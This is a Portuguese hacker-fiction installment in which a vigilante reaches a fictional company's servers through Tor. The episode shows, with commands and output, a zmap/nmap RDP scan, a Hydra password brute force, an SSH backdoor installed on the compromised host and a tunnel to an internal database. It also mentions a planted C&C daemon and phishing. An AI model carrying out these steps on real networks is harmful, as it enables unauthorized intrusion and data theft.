Hack the Planet!

Quarta-feira, 10:30 AM

Brasília, DF.

Um sedan preto da Ford estaciona em frente ao Palácio Buriti. Por uma das portas traseiras sai um homem de mais ou menos 55 anos, estatura mediana, calvo, óculos escuros e uns quilos a mais. Seu nome é José Maria. “Zezinho” para os mais íntimos. Iremos chamá-lo por este carinhoso apelido.

Zezinho é deputado federal em Brasília, tendo assim grande influência para que “as coisas andem mais rapidamente”. É suspeito de ter feito parte de esquemas ilícitos deflagrados na famosa Operação Lava Jato. Como você caro leitor deve saber, muitos dos políticos têm uma certa blindagem, um poder que é complicado para nós meros mortais entendermos.

Pois bem, Zezinho como de costume, ao sentar em sua mesa, verifica os e-mails diariamente em seu iPad Air 2. O assunto em negrito de um e-mail não lido chama sua atenção: “Foi um sucesso!”.

Zezinho coloca o dispositivo sobre a mesa e fica um pouco pensativo a respeito do e-mail que acabou de ler.

— Mas esse presidente é muito sem noção hein? Não poderia ter escolhido outro local pra entregar a propina? — Pensa.

Ele sabe que os serviços da Tabajara são importantes para cobrir as falcatruas feitas pelo governo. Então por hora acha melhor não descartar seus serviços. Somente algumas pessoas sabem desta ligação.

Mas Case e os outros também sabem.

#Coletando Informações

Nesta manhã de quarta-feira após chegar do aeroporto, Case vai para o bar no qual trabalha e resolve jogar as cartas para o seu chefe. Fala que não poderá mais trabalhar lá, que encontrou algo melhor, etc, etc.

Case precisará de dedicação em tempo integral na operação do grupo, pois ainda existe muito a ser feito.

Como você caro(a) leitor(a) deve ter visto na edição #05, o grupo agora tem acesso remoto à rede da Usina de Belo Monte. O Daemon que está em execução fará um bom trabalho para todos ao coletar quaisquer informações e enviá-las para uma central de C&C (Comando e Controle) via rede P2P (Ponto a ponto). Este canal de comunicação é muito utilizado por invasores que precisam manter acesso a computadores infectados por um malware produzido por eles mesmos. Em nosso caso seria algo similar rsrs.

Enfim, ainda é muito cedo para que o Daemon tenha enviado alguma informação importante.

É realmente incrível como sistemas críticos são administrados por pessoas que não dão a devida importância para a segurança das informações. Uma pessoa mal intencionada (ou não) pode utilizar um simples smartphone para coletar dados que trafegam pela rede sem fio. A coisa fica mais séria quando esta mesma rede sem fio está ligada à rede administrativa… aí você já pode imaginar o que pode acontecer.

Como nossos amigos também têm acesso à rede da Corvo, eles poderão através dessa empresa, coletar informações enquanto não recebem as que o Daemon também enviará. Assim como a Corvo, existem muitas outras empresas que “prestam serviços” para o governo, numa tentativa de encobrir os rastros de suas operações.

A pesquisa de Case e dos demais do grupo gira em torno de empresas que prestam serviços para o governo, empresas estas, que agora sugam milhões, consequentemente do seu e do meu bolso. As fontes de pesquisas podem ser várias, incluindo: scan de grandes intervalos de endereços IP (v4), buscas na web utilizando uma técnica chamada “Google dork”, vasculhar o lixo de empresas suspeitas (Dumpster Diving) em busca de informações importantes, engenharia social (esta podendo ser aplicada presencialmente, por telefone ou via software (e-mail, sites falsos, etc)), dentre outras. Mas vamos nos ater somente ao que citei agora a pouco.

Case recebe uma mensagem criptografada em seu e-mail. Após abri-la descobre que uma empresa privada ligada ao governo está fazendo lavagem de dinheiro, numa tentativa de justificar a sua real origem. De posse do nome desta empresa – vamos chamá-la de “Lava Corp” – Case utilizará uma ferramenta, no meio de muitas, chamada zMAP, para que sua varredura na web seja mais produtiva.

## zMAP

A ferramenta zMAP é um scanner de rede que possui código aberto, permitindo que um pesquisador (ou os ***hats da vida) efetue estudos em uma boa parte da infraestrutura da Internet. Com uma única máquina e um bom link de Internet, o zMAP é capaz de executar uma varredura completa em diversos intervalos de endereços IPv4 em menos de 5 minutos, se aproximando do limite teórico de 10 gigabit ethernet.

O zMAP pode ser usado para estudar a utilização de algum protocolo ao longo do tempo, monitorar a disponibilidade do serviço, dentre outras coisas mais.

Case após chegar do bar, liga o seu laptop. Ele ainda não possui o zMAP, então precisará instalá-lo.

$ sudo yum install zmap

A instalação é concluída com sucesso.

Lembre-se que devemos nos preocupar em ocultar nossos rastros, ou pelo menos dificultar a nossa rastreabilidade. O navegador TOR e a ferramenta Proxychains serão nossos ótimos aliados. O Proxychains desempenhará um papel importante aqui, pois fará com que o tráfego gerado pelos comandos digitados no terminal sejam direcionados para o túnel da rede TOR.

Bora começar a coletar algumas informações?

$ proxychains whois lavacorp.com.br

Aparecem as seguintes informações:

% Copyright (c) Nic.br
% The use of the data below is only permitted as described in
% full by the terms of use at http://registro.br/termo/en.html ,
% being prohibited its distribution, commercialization or
% reproduction, in particular, to use it for advertising or
% any similar purpose.
% 2015-07-01 13:20:59 (BRT -03:00)
% Query rate limit exceeded. Reduced information.
% Use https://registro.br/cgi-bin/nicbr/busca_dominio for domain availability.
domain: lavacorp.com.br
owner: Lava Corp S/A
responsible: José Maria da Silva
country: BR
owner-c: JJJJ11
admin-c: JJJJ11
tech-c: JJJJ11
billing-c: JJJJ11
nserver: ns1.lavacorp.com.br
nsstat: 20150921 AA
nslastaa: 20150921
nserver: ns2.lavacorp.com.br
nsstat: 20150921 AA
nslastaa: 20150921
created: 20141005
expires: 20161005
changed: 20150402
status: published
nic-hdl-br: JJJJ11
person: IT Lava Corp
created: 19950512
changed: 20150601
% Security and mail abuse issues should also be addressed to
% cert.br, http://www.cert.br/ , respectivelly to cert@cert.br
% and mail-abuse@cert.br
%
% whois.registro.br accepts only direct match queries. Types
% of queries are: domain (.br), registrant (tax ID), ticket,
% provider, contact handle (ID), CIDR block, IP and ASN.

E agora preciso saber qual o IP do site da Lavacorp:

$ proxyresolv lavacorp.com.br

|S-chain|-<>-127.0.0.1:9150-<><>-4.2.2.2:53-<><>-OK
200.200.200.200

Agora temos o IP 200.200.200.200 e ainda podemos descobrir mais coisas sobre ele:

$ proxychains whois 200.200.200.200
ProxyChains-3.1 (http://proxychains.sf.net)

[Consulta whois.lacnic.net]Axur e-zine
|DNS-request| whois.lacnic.net
|S-chain|-<>-127.0.0.1:9150-<><>-4.2.2.2:53-<><>-OK
|DNS-response| whois.lacnic.net is 200.3.14.10
|S-chain|-<>-127.0.0.1:9150-<><>-200.3.14.10:43-<><>-OK
[Redirecionado para whois.registro.br]
[Consulta whois.registro.br]
|DNS-request| whois.registro.br
|S-chain|-<>-127.0.0.1:9150-<><>-4.2.2.2:53-<><>-OK
|DNS-response| whois.registro.br is 200.160.2.3
|S-chain|-<>-127.0.0.1:9150-<><>-200.160.2.3:43-<><>-OK
[whois.registro.br]
% Copyright (c) Nic.brAxur e-zine
% The use of the data below is only permitted as described in
% full by the terms of use at http://registro.br/termo/en.html ,
% being prohibited its distribution, commercialization or
% reproduction, in particular, to use it for advertising or
% any similar purpose.
% 2015-09-12 15:39:31 (BRT -03:00)
inetnum: 200.200.200.100/29
aut-num: JJJJ11
abuse-c: @#$@
owner: Lava Corp S/A
ownerid: 111.111.111/0001-11

Tô vendo que a Lava Corp S/A possui um CIDR próprio de IPs (200.200.200.100/29). É esta informação que ele utilizará no zMAP. Uma faixa de endereços pode conter os mais variados tipos de serviços, portas abertas e outras informações interessantes. Existem empresas que configuram erroneamente o recurso de NAT (Network Address Translate ou Tradução de endereço de rede), deixando expostos na Internet servidores críticos.

A coisa está ficando boa.

#Acessando servidores

De posse do CIDR, Case faz uma varredura em busca de servidores que estejam com a porta 3389 aberta. Esta porta responde pelo protocolo RDP (Remote Desktop Protocol), muito utilizado em servidores Windows para prover o acesso remoto, podendo um(a) usuário/suporte/consultoria utilizar o servidor como se estivesse sentado na frente dele.

Os IPs dos servidores que forem encontrados através da varredura serão salvos em um arquivo de nome Servers.csv.

$ sudo proxychains zmap -p 3389 -o Servers.csv 200.200.200.100/29
ProxyChains-3.1 (http://proxychains.sf.net)

Aug 01 14:50:12.552 [WARN] blacklist: ZMap is currently using the default blacklist located at /etc/zmap/blacklist.conf. By default, this blacklist excludes locally scoped networks (e.g. 10.0.0.0/8, 127.0.0.1/8, and 192.168.0.0/16). If you are trying to scan local networks, you can change the default blacklist by editing the default ZMap configuration at /etc/zmap/zmap.conf.

Aug 01 14:52:12.114 [INFO] zmap: output module: csv

0:00 0%; send: 0 0 p/s (0 p/s avg); recv: 0 0 p/s (0 p/s avg); drops: 0 p/s (0 p/s avg); hitrate: 0.00%
0:01 14%; send: 8 done (61 p/s avg); recv: 3 2 p/s (2 p/s avg); drops: 0 p/s (0 p/s avg); hitrate: 37.50%
0:02 26%; send: 8 done (61 p/s avg); recv: 3 0 p/s (1 p/s avg); drops: 0 p/s (0 p/s avg); hitrate: 37.50%
0:03 39%; send: 8 done (61 p/s avg); recv: 3 0 p/s (0 p/s avg); drops: 0 p/s (0 p/s avg); hitrate: 37.50%
0:04 51%; send: 8 done (61 p/s avg); recv: 3 0 p/s (0 p/s avg); drops: 0 p/s (0 p/s avg); hitrate: 37.50%
0:05 63% (3s left); send: 8 done (61 p/s avg); recv: 3 0 p/s (0 p/s avg); drops: 0 p/s (0 p/s avg); hitrate:Axur e-zine 37.50%
0:06 76% (2s left); send: 8 done (61 p/s avg); recv: 3 0 p/s (0 p/s avg); drops: 0 p/s (0 p/s avg); hitrate: 37.50%
0:07 88% (1s left); send: 8 done (61 p/s avg); recv: 3 0 p/s (0 p/s avg); drops: 0 p/s (0 p/s avg); hitrate: 37.50%
Aug 21 14:53:22.200 [INFO] zmap: completed

A varredura está completa.

Case lista o conteúdo do arquivo Servers.csv

$ cat Servers.txt
200.200.200.200
200.200.200.102
200.200.200.103

Se reparar em um dos endereços IP acima, perceberá que é o mesmo endereço do servidor que hospeda o site da Lava Corp S/A. Logo, podemos supor que se trata de um Windows Server. Lembra do que falei em configurar o NAT incorretamente e expor servidores na web servidores importantes? Aqui, Case viu que os “administradores” dimensionaram bem toda a topologia… Por enquanto temos alguns IPs e sabemos que a porta 3389 está aberta. Case quer ir mais a fundo e resolve utilizar o poderoso scan Nmap.

$ sudo proxychains nmap -sV -P0 200.200.200.200
ProxyChains-3.1 (http://proxychains.sf.net)

Starting Nmap 6.47 ( http://nmap.org ) at 2015-09-01 21:50 BRT
|S-chain|-<>-127.0.0.1:9150-<><>-200.200.200.200:21-<><>-OK
|S-chain|-<>-127.0.0.1:9150-<><>-200.200.200.200:53-<><>-OK
|S-chain|-<>-127.0.0.1:9150-<><>-200.200.200.200:80-<><>-OK
|S-chain|-<>-127.0.0.1:9150-<><>-200.200.200.200:3389-<><>-OK

Os seguintes serviços estão em execução:

• Servidor FTP, porta 21;

• DNS Server, porta 53;

• Servidor Web, porta 80;

• Terminal Service, porta 3389

Apenas por curiosidade Case pensa em acessar o sistema alvo utilizando algum cliente do protocolo RDP. Case prefere utilizar o rdesktop, aplicação que pode ser utilizada a partir do terminal de seu Linux. Após digitar:

$ proxychains rdesktop 200.200.200.200 -u administrador

Eis que aparece a tela de um SO há muito tempo não visto…

Você pensa: “Como pode um Windows XP estar acessível via web?”

Isso porque a Microsoft decretou a morte deste S.O já faz um bom tempo… Realmente algumas empresas ligadas ao governo não estão se preocupando tanto com a segurança. 🙂

Como Case não sabe a senha deste “server”, apela diretamente para o Hydra, uma aplicação de brute force que tenta adivinhar a senha do sistema alvo com base numa wordlist.

$ proxychains hydra -l administrador -P passlist.txt 200.200.200.200 rdp

A aplicação foi muito eficiente neste caso. Em menos de uma hora conseguiu adivinhar a senha do usuário administrador. A seguinte senha foi revelada a Case: 123mudar (????). Sem comentários.

De posse da senha, Case digita novamente o seguinte comando:

$ proxychains rdesktop 200.200.200.200 -u administrador

E digita a senha revelada pelo Hydra.

Case agora está na área de trabalho de uma estação (ou servidor kkkk) Windows XP da Lava Corp. Existem muitos atalhos, mas um deles chamada a sua atenção: um atalho para o sistema financeiro da empresa que roda num SAP. Ele clica duas vezes e espera carregar a tela de login. Em uma combobox, Case pode escolher em qual servidor deseja se conectar, mas não se conecta a nenhum, simplesmente anota os IPs que aparecem.

Com um simples telnet em algumas portas dos IPs que anotou, Case descobre em qual porta os servidores de banco de dados estão esperando por conexões. A porta que teve sucesso de conexão foi a 1443, ou seja, é um SQL Server da Microsoft.

Case não quer dar muito mole ao ficar bisbilhotando dentro do Windows XP, então resolve baixar e instalar um servidor SSH conhecido como OpenSSH para rodar neste SO (No XP).

Mas qual o real motivo de querer instalar um servidor SSH no Windows XP? Simples. Case quer fazer um túnel SSH através dele (usá-lo como um tipo de ponte), e assim poder fazer mais testes de acesso nos servidores de banco de dados.

Case altera a porta padrão do SSH, de 22 para 9023, e inicia o serviço no Windows XP. Para testar se a porta 9023 está acessível à partir da Internet, roda um Nmap:

$ sudo proxychains nmap -sV -P0 200.200.200.200
ProxyChains-3.1 (http://proxychains.sf.net)

Starting Nmap 6.47 ( http://nmap.org ) at 2015-09-01 21:50 BRT
|S-chain|-<>-127.0.0.1:9150-<><>-200.200.200.200:21-<><>-OK
|S-chain|-<>-127.0.0.1:9150-<><>-200.200.200.200:53-<><>-OK
|S-chain|-<>-127.0.0.1:9150-<><>-200.200.200.200:80-<><>-OK
|S-chain|-<>-127.0.0.1:9150-<><>-200.200.200.200:3389-<><>-OK
|S-chain|-<>-127.0.0.1:9150-<><>-200.200.200.200:9023-<><>-OK

Podemos ver que a porta 9023, referente ao OpenSSH está aberta (além das demais portas). Outro teste básico é executar o aplicativo telnet, a fim de constatar se o acesso está permitido, pois uma coisa é a porta estar aberta, outra totalmente diferente é ela permitir conexão para qualquer um.

 $ proxychains telnet 200.200.200.200 9023
Trying 200.200.200.200…
Connected to 200.200.200.200.
Escape character is '^]'.
SSH-2.0-OpenSSH_5.3  

Para a alegria de Case, podemos ver que o teste de acesso à porta 9023 ocorreu com sucesso. Isso quer dizer que a conexão ao OpenSSH está funcionando corretamente, conforme o banner mostrado no exemplo acima.

Case se desconecta da sessão do Terminal Service e começará a trabalhar daqui em diante à partir de seu Linux, sem a necessidade de se conectar ao serviço RDP (porta 3389) do server da Lava Corp.

Nosso amigo agora criará o tunel SSH, com o Windows XP, e este por sua vez fará a ponte entre o servidor de banco de dados.

$ sudo proxychains ssh -L 1234:172.16.0.222:1443 usuario@200.200.200.200

Na humilde topologia abaixo você terá uma idéia de como ocorreu este processo, e como será daqui em diante.

Obs: Encontrar um Windows XP acessível na Internet com várias portas abertas é um fato, e não algo impossível de acontecer nos dias atuais. Uma simples busca pode revelar coisas interessantes para alguém com boas ou más intenções.

Case tem agora acesso remoto ao ambiente da Lava Corp. Quando ele quiser testar o acesso ao servidor de banco de dados, basta utilizar IP público, seguido da porta 1234 (200.200.200.200:1234). Não entendeu?

Vamos lá:

No momento da criação do túnel SSH, Case configurou uma porta de entrada (1234) e outra de saída (1443). Então sempre que ele digitar em algum client de SQL o endereço 200.200.200.200:1234, ele será direcionado ao servidor de banco de dados, que possui o serviço do SQL Server esperando por conexões na porta 1443.

#Descanso

Utilizando seu BlackPhone, Case faz uma ligação criptografada (pela rede sem fio) para Marcus, e conta sobre tudo o descobriu.

– Esta descoberta é uma carta na manga, Case.

– O Cereal Killer entrou em contato comigo agora a pouco, nem me deixou dormir quando cheguei do aeroporto. Ele quer conversar conosco, mas não no club (Veja edição #02), e sim na cafeteria de algum shopping. Quer sair um pouco do ambiente do club e fazer algumas reuniões em outros lugares. Diversas vezes ele viu um carro preto, sem placas e vidros escuros passar na rua do club. Ainda bem que não conseguiram identificar a entrada principal, e Cereal Killer sempre mudava o percurso até ter certeza de que o carro não estava passando no momento em que fosse entrar. Por isso o medo.

– Quando e em qual shopping ele quer nos encontrar? – Pergunta Case.

– Hoje às 20:30, no Santa Cruz. Você consegue chegar facilmente lá pela linha azul do metrô.

– Sei como chegar lá seu mané, pois moro em São Paulo faz tempo! (Risos)

– Desculpe Case, é o costume de querer explicar tudo para todos.

– Fica sussa Marcus. A gente se encontra lá.

Essa vida de hacking às vezes cansa. São compromissos, reuniões, viagens, e alguns perigos em que Case e os demais do grupo podem ser expostos. Mas isto está no seu sangue. A curiosidade, a vontade de mudar as coisas, de não aceitar tudo o que acontece, de sempre questionar, é algo que faz parte dele. A tecnologia é um modo de se conectar com tudo, com os seus objetivos e com os dos demais do grupo.

Case toma um banho demorado, deixando a água cair em sua cabeça, enquanto pensa onde tudo isso vai dar.

Já deitado, coloca seu fone de ouvido e uma playlist do Spotify para tocar. No momento ele quer relaxar, então ouve músicas tranquilas enquanto “viaja”.

#Ação

Anoitece em São Paulo, a cidade que nunca dorme. Milhares de pessoas voltam para suas casas, ou para outros lugares, após um dia cansativo no trabalho, criando assim o conhecido congestionamento de todo o santo dia. Apesar dos pesares, Case prefere o transporte público, pois este meio, na maior parte do tempo, chega a ser mais rápido do que o automóvel.

Case caminha de sua casa até a estação Butantã, linha amarela. Chegando lá, aguarda na plataforma, mas não entra no primeiro metrô que estaciona. Se encosta na parede com as mãos nos bolsos de sua blusa escura, com o capuz colocado na cabeça, enquanto observa as pessoas entrarem e saírem dos carros do metrô.

Entra no próximo que estaciona, e senta em um banco localizado no fundo do vagão, que está um pouco vazio. Faz baldeação na estação Paulista, Paraíso e finalmente chega na estação Santa Cruz, que fica junto do shopping de mesmo nome. Sobe as escadas rolantes tranquilamente, chegando à praça de alimentação. Olha em volta, até que avista duas pessoas acenando discretamente para ele.

– Olá Case! – Cumprimentam Cereal Killer e Marcus ao mesmo tempo.

– E aí…. – Responde Case.

Os três sentam em uma mesa localizada discretamente no canto de uma cafeteria e logo pedem algo para tomar e comer. Case tira de sua mochila um tablet, que agora está atualizado para o Kali 2.0. O famoso dragão aparece quando o boot está sendo feito. Como é de praxe, Case vasculha as redes sem fio existentes no local, que são muitas. Desta vez não precisou fazer nenhum esforço, pois encontrou uma rede aberta e sem senha. Como a privacidade é importante, Case na sequência utiliza a rede Tor para se conectar à Internet.

– Chamei vocês dois antes de todos porque gostaria de deixá-los a par de algumas notícias. Temos informações de que o governo está armando emboscadas para diversos hackers. Alguns sumiram do mapa e ninguém sabe o que aconteceu com eles.

– Com certeza deram fim neles. – Comenta Case.

– Provavelmente. E isso me leva a crer que o carro sem identificação que passou recentemente na rua do club pode estar de certa forma ligado a isso. – Responde Cereal.

Os três ficam pensativos, enquanto se alimentam.

Numa rua deserta próxima ao shopping, um carro sem identificação estaciona lentamente. De seu interior saem quatro homens vestindo o mesmo traje: calça jeans preta, camisa cinza, um sobretudo e os coturnos de couro também pretos, lembrando um pouco a roupa de Neo, do filme Matrix, quando ele surge no hall de um prédio junto com Trinity, na cena de tiros mais famosa do cinema. Ambos caminham decididamente, quase que num estilo militar. Sobem as escadas rolantes, chegando na praça de alimentação. Com olhos de águia e movimentos de cabeça robóticos vasculham ao redor.

Levantando lentamente da mesa de uma cafeteria, três rapazes tentam sair dali sem deixar suspeitas. No meio do percurso, Marcus esbarra acidentalmente em uma cadeira, fazendo aquele barulho. Um dos homens vira em sua direção, cutucando discretamente os seus comparsas. Tanto as presas como os caçadores trocam olhares, num estilo de duelo de faroeste, quando apenas os olhos se mexem.

Case vira a cabeça para Marcus e Cereal, e fala baixinho: – Vamos dar no pé daqui…

Em um momento o tempo parece acontecer em câmera lenta. Logo em seguida, o estado de “bullet time” acaba, e os três hackers saem correndo, praticamente atropelando quem estava em seu caminho, mas pedindo licença. Os capangas fazem o mesmo, mas derrubavam cadeiras, empurravam as pessoas, para a qualquer custo colocarem as mãos nos hackers que eles foram contratados para dar o fim.

Um tumulto é formado por conta da perseguição, onde as pessoas não se davam conta do que estava acontecendo. Na saída do shopping localizada na rua Domingo de Moraes, os 3 hackers correm em direção à Rua Loefgren. Logo em seguida ouvem um barulho de batida de carro. Dão uma olhada para trás a tempo de verem que um dos capangas foi atropelado no momento em que atravessava o cruzamento. Dois de seus comparsas pararam para acudir o atropelado. E o outro onde está?

Nossos amigos continuam a correr, quando de repente ouvem tiros. Case olha rapidamente para trás e vê o autor dos disparos. Os três resolvem se separar, cada um indo em direções aleatórias e tentando se esconder como podem.

#Surpresas

Seu nome é John, americano, 38 anos, nacionalizado brasileiro. Serviu as forças armadas dos EUA nos anos 2000 durante um ano. Após este período a realidade caiu para a maioria dos que serviram ao país. O desemprego. O descarte por parte do governo americano. Foi nesse momento que um conhecido seu, brasileiro, o convidou para morar no Brasil e fazer uns “bicos”. Foi aqui no nosso querido país que John se encontrou, pois agora estava fazendo o que realmente gostava: puxar o gatilho de uma pistola .40 várias e várias vezes. Eis que após um certo tempo de serviços prestados para pessoas e empresas anônimas, John foi convidado por mais uma fonte anônima para fazer o serviço de segurança de um figurão do governo federal. Ele é nada mais nada menos que José Maria da Silva, o nosso querido deputado federal citado no início desta edição.

Zezinho é uma pessoa que presa imensamente pelo seu bem material, mais ainda pela sua imagem, muito importante para os negócios nos dias de hoje. O que seria dele se uns loucos por computadores revelassem informações que pudessem comprometê-lo? Zezinho pode se utilizar dos mais variados recursos para manter a sua imagem intacta e a de outros figurões do governo, podendo até ser a imagem de alguém do alto escalão. Zezinho e outros do governo utilizam os serviços de John e de sua equipe para fazer uma limpeza em qualquer tipo de “sujeira”, e isso inclui fazer com que hackers tenham o encontro com Deus mais cedo.

Durante meses, a equipe de “inteligência” do governo estava atrás de hackers que tentavam de alguma forma “prejudicar” o governo e seus interesses. Foi aí que uma fonte ligada aos hackers acabou revelando algumas informações sobre a operação “Queda do sistema”. Essas informações incluíram fotos de alguns hackers (Case e Marcus), e o plano de tentar fazer algo na inauguração da Usina de Belo Monte. O “Judas” da vez foi Cipher, por ter revelado algumas informações sobre a operação. Mas isso ainda não explica como eles conseguiram localizar os hackers no Shopping Sta Cruz. Essa informação não foi passada por Cipher. Talvez nem saibamos quem foi.

Existe um fato que não revelei a você meu/minha caro(a) leitor(a) na edição passada. O celular de Case ficou retido por alguns minutos na portaria da Usina, no momento em que estava indo embora, pois o guarda constatou que o lacre de segurança colocado na câmera do smartphone de Case estava violado. Conforme as regras de segurança de muitas empresas que utilizam esta medida, caso o lacre seja violado, o smartphone ou tablet deverá ficar retido para averiguação. Este tempo durou cerca de meia hora, tempo suficiente para que o smartphone de Case fosse adulterado, a fim de que Zezinho e toda a sua equipe pudesse monitorar Case. Todos cometem deslizes ao não tomar as medidas necessárias de segurança, e Case cometeu o seu primeiro em não verificar o que possivelmente pudesse ter sido adulterado pelo atencioso guarda da Usina de Belo Monte. Mas como ele poderia adivinhar né? Mas agora não é hora para pensar nisso.

E aqui voltamos para o dia de hoje, onde John está perseguindo Case e seus amigos pelas ruas de São Paulo.

#Reviravolta

John ao virar em uma esquina não avista mais ninguém. Para onde foram? Baixa a arma e a coloca no coldre, localizado embaixo do sobretudo. John ouve o som de um carro sendo ligado e cerra os olhos, numa tentativa de poder ouvir com mais nitidez a origem daquele som.

Quando conseguiu entender de onde vinha, era tarde de mais. Um Fiat Uno branco desce rapidamente uma ladeira e atinge em cheio John, ceifando sua vida instantaneamente.

Cereal Killer desce do veículo e se aproxima do corpo inerte e revista os bolsos do falecido. Ele encontra um smartphone. No visor ele pôde ver perfeitamente um ponto no GPS, indicando a localização exata do smartphone de Case a uns 2 metros dali.

– Case, eles estavam monitorando sua localização.

– Não pode ser. – Responde Case.

Case verifica em seu celular e constata que o GPS está em execução, mas o seu ícone indicando esta atividade, não aparece no topo do visor.

– É, quase fui pego. – Pensa.

– Case, temos que dar o fora daqui! Bora! Precisamos pensar um pouco e providenciarmos um local seguro para que vocês dois fiquem escondidos. – Fala Cereal.

Os três abandonam o local e se dirigem rapidamente para o club.

Um dia é da caça, outro é do caçador.

#Expectativa

Hora: 23:35

Cereal, Case e Marcus sentam-se nos sofás, localizados no lounge do club.

– O que faremos daqui pra frente? Desistir da operação e cada um seguir com suas vidas? – Pergunta Case.

– É claro que não, desistir jamais! Obviamente precisaremos ser mais cautelosos daqui pra frente. Não fiquem dando mole por aí. Somente saiam nas ruas se realmente for necessário. – Responde Cereal.

Case sente um pequeno aperto no peito ao saber que as coisas não serão como antes, mas é um sacrifício que ele está disposto a fazer. Existem objetivos maiores em jogo. Se estica no sofá e tenta dormir um pouco, pois a noite foi tumultuada. Os outros fazem o mesmo.

Pensamentos desconexos povoam sua mente. Existe muito mais a ser feito e o cuidado precisará ser redobrado a partir de agora.

#Vingança

Próximo da meia noite, numa residência de alto luxo em Brasília, DF, um deputado esmurra a sua escrivaninha ao saber através de uma ligação o que aconteceu na perseguição de hoje em São Paulo.

– Eu mato eles!

Continua…

Hoje é o dia da inauguração da Usina de Belo Monte. Um acontecimento importante para muitas pessoas, mas não para Case (Crazy4Tech), Marcus e para alguns brasileiros. Esta construção é uma gota num mar de coisas irregulares que acontecem no país.

À esta dupla se juntarão mais duas pessoas que darão um certo gás na trama. Como contei nas edições anteriores, a operação do grupo visa derrubar o sistema atual de maneira gradativa, similar às empresas que sofrem ataques cibernéticos e não percebem que algo está acontecendo bem à sua frente.

Chegará o dia em que tudo será revelado, divulgado, contado e não perdoado.

Aviso: Esta edição do Diário de um Hacker, é uma obra de ficção, assim como todas as edições anteriores e as futuras. Os nomes dos locais são ficcionais. Qualquer semelhança com a realidade é uma mera coinscidência. As ferramentas e softwares citados são reais e pertencem aos seus respectivos autores. Use-as com prudência e apenas para fins de estudo.

“VOCÊ PODE DETER A MIM, MAS NÃO A TODOS NÓS, POIS NO FINAL DAS CONTAS SOMOS TODOS UM SÓ.“

Terça-feira, 06:30 AM – Chegando em Altamira

O sol está nascendo em Altamira, num visual que faz cair o queixo de qualquer um que contemple a beleza da paisagem. No aeroporto, Case e Marcus pegam suas malas na esteira, num amontoado de pessoas que apressadamente também querem pegar suas coisas.

– Case, tô com uma fome…

– Calma Marcus, vamos ali tomar um cafezinho e nos organizarmos pra hoje.

Case toma o primeiro gole de cappuccino e começa a verificar as redes sem fio disponíveis no aeroporto. É incrível como em todo o lugar que vai, acaba encontrando alguma rede aberta e vulnerável. É claro que várias dessas redes são disponibilizadas com a intenção de capturar dados de usuários desavisados ou desprovidos de senso de segurança e também da falta de um pouco de paranóia. Antes de se conectar em qualquer rede sem fio, Case, quando em campo, utiliza uma VPN (obviamente com uma boa criptografia) com um provedor específico, que pode estar localizado em qualquer parte do mundo. E a partir deste, é que ele acessa a Internet de fato. Em alguns casos, como uma “proteção” adicional, utiliza a rede Tor para as suas ações.

Assim como boa parte dos Hackers, ele sente uma necessidade enorme em testar a segurança de um sistema ou rede. Não importa se ele está de posse de um smartphone, tablet ou notebook, com certeza executará um War Walking com as ferramentas disponíveis.

Os dois seguem em direção a um hotel próximo dali para deixar suas coisas e seguirem viagem.

– Então Marcus, daqui até a usina levaremos um pouco mais de 1h e meia, já contando com a balsa.

– Chegando lá, vamos “conhecer” as dependências enquanto todos estarão ocupados com a celebração solene de inauguração. Vamos procurar por redes sem fio desprotegidas, conhecer a infraestrutura como um todo e plantarmos a nossa semente. Deixaremos um “Daemon” em execução que coletará informações da rede e enviará diretamente para nós tudo o que encontrar.

O MELHOR ATAQUE É AQUELE QUE ACONTECE NA FRENTE DO ADVERSÁRIO SEM QUE ELE SE DÊ CONTA.

– É isso aí Case! Bora?

A dupla aluga um carro, obviamente fornecendo documentação “não original” e fazem uma pequena viagem até a balsa, localizada a alguns km adiante. Durante o percurso permanecem em silêncio, mas Marcus pluga seu Blackphone no carro para curtir algumas músicas.

A Inauguração

Hoje é o tão aguardado dia. A usina de Belo Monte será inaugurada, para a alegria dos empresários, pois foi construída num prazo recorde e “trará benefícios” a todos. Muita coisa aconteceu durante sua construção, mãos foram “molhadas”, coisas aconteceram por baixo dos panos, moradores prejudicados, etc, etc. Mas é o Brasil né? Carregamos essa fama.

Ônibus lotam o estacionamento e as imediações da Usina. Centenas de pessoas de várias partes do país vieram prestigiar o evento, em um comportamento similar àquela cena de Matrix Reloaded, quando não paravam de aparecer vários agentes Smith vindos de tudo quanto é canto.

Case e Marcus entram na fila trajando roupas com ares de nerds dos anos 80… Creio que ninguém jamais imaginará quais as reais intenções da dupla.

Mas uma coisa que todos precisamos saber, é que sempre tem alguém no meio da multidão nos observando. No caso deles não é diferente. Alguém os observa, assim como quando embarcaram no avião em São Paulo (Veja o final da edição #04 do Diário de um Hacker).

Marcus foi o primeiro a passar pela portaria tranquilamente. Mas na vez de Case o apito soou e ele teve que esvaziar a mochila em uma mesa ao lado do portão de segurança. O agente de segurança verifica a mochila com seus olhos de águia. Observou um fone de ouvido, alguns fios, uma lata de batatinhas Pringles (olha o merchandising hein?), um miniteclado e um tablet. Após ver esse último ítem o agente pergunta:

– O que é isso garoto?

– É um tablet ué? Vou precisar dele para checar meus e-mails.

– Sabe que é proibido tirar fotos aqui hein? Vou colocar um adesivo em frente a câmera do dispositivo. Quando voltar, apresente o seu equipamento com este lacre intacto para que eu possa deixá-lo passar na portaria novamente, ok?

– Ok, ok…

A dupla achou melhor não trazer seus laptops pois chamaria muito a atenção, então os deixaram no hotel. Somente Case trouxe um tablet, que para a sua alegria estava equipado com o Kali Linux, e o miniteclado a parte para facilitar a digitação.

Resolvem sentar-se em um banco para começarem a “trabalhar”. Case liga seu tablet e um conhecido dragão aparece na tela. Utilizando alguns comandos (Veja na edição #04 do Diário de um Hacker) ele verifica que existem algumas redes sem fio utilizando o protocolo WEP (Pasmem!), um dos mais inseguros que existe. Case escolhe uma rede específica e deixa seu tablet coletando informações da rede desprotegida. Enquanto isso toma um café. Marcus o acompanha.

Quando Case leva a xícara de café a boca pela segunda vez, alguém senta à sua mesa.

– E aí meus amigos, tudo bem? Por que essas caras? É claro que ainda não me conhecem, pessoalmente devo dizer. Mas no mundo virtual temos conversado, lembram?

– INEM? – Pergunta Marcus espantado.

– O que está fazendo aqui? Questiona Case.

– Lembram do Cipher? O traídor? Então, ele também está aqui.

– Já sabemos INEM. O cara é “tão esperto” que abriu o link para uma página fake que enviamos a ele. Sua última localização foi num hotel em Altamira. Mas ele não será nenhum problema. – Responde Case. – Como conseguiu entrar INEM?

– Eu vim limpo cara, só o meu querido celular e nada mais. Hoje estou de “folga”.

Um bipe é emitido do tablet, indicando o término da coleta de informações da rede sem fio.

